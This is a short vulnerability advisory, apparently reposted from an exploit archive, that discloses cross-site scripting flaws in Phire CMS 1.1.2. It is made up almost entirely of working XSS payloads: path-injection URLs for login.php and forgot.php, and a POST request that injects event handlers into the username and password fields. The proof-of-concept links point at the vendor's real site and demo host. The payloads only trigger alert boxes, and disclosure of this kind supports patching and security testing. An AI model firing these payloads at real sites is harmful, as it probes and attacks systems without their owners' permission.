Phire CMS 1.1.2 - Multiple XSS Vulnerabilities

#Title: Phire CMS 1.1.2 - Multiple XSS
#Vendor: phirecms.org - en.wikipedia.org/wiki/Phire_CMS
#Version: 1.1.2 (Latest ATM)
#Demo: demo.phirecms.org
#Date: 01.25.2014
#Contact: smash[at]devilteam.org

1. Cross Site Scripting

a) login.php

Request:
host/phire/login.php/666"><img%20src%3d666%20onerror%3dalert(666)>

Injection point:
<form action="/phire/login.php/666"><img src=666 onerror=alert(666)>" 

PoC:
phirecms.org/phire/login.php/666"><img%20src%3d666%20onerror%3dalert(666)> (...)

b) forgot.php

Request:
host/phire/forgot.php/666"><img%20src%3d666%20onerror%3dalert(666)>

Same as above.

c) POST - username & password

Request:
POST /phire/login.php HTTP/1.1
Host: demo.phirecms.org

username=666" onmouseover=alert(666) bad="0&password=777" onmouseover=alert(777) bad="&submit=LOGIN

Injection point:
  <input type="text" name="username" id="username" value="666\" onmouseover=alert(666) bad=\"0" style="width: 220px;" size="35" />
    (...)
  <input type="password" name="password" id="password" value="777\" onmouseover=alert(777) bad=\"" style="width: 220px;" size="35" />

#  0day.today [2018-01-01]  #